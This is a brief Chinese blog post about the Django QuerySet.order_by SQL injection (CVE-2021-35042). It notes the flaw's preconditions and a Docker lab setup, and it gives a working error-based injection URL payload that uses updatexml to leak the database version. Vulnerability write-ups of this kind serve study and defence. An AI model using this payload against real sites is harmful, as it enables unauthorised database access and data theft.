漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
wxin_VXbishe12 分钟前
springboot合肥师范学院实习实训管理系统-计算机毕业设计源码31290mariokkm3 小时前
Django一分钟:在Django中怎么存储树形结构的数据,DRF校验递归嵌套模型的替代方案coderWangbuer4 小时前
基于springboot的高校招生系统(含源码+sql+视频导入教程+文档+PPT)数据龙傲天5 小时前
1688商品API接口:电商数据自动化的新引擎cyt涛6 小时前
MyBatis 学习总结Rookie也要加油6 小时前
01_SQLite向上的车轮6 小时前
Django学习笔记五:templates使用详解与衫7 小时前
掌握嵌套子查询:复杂 SQL 中 * 列的准确表列关系向上的车轮9 小时前
Django学习笔记十一:部署程序我明天再来学Web渗透1 天前
【hot100-java】【二叉树的层序遍历】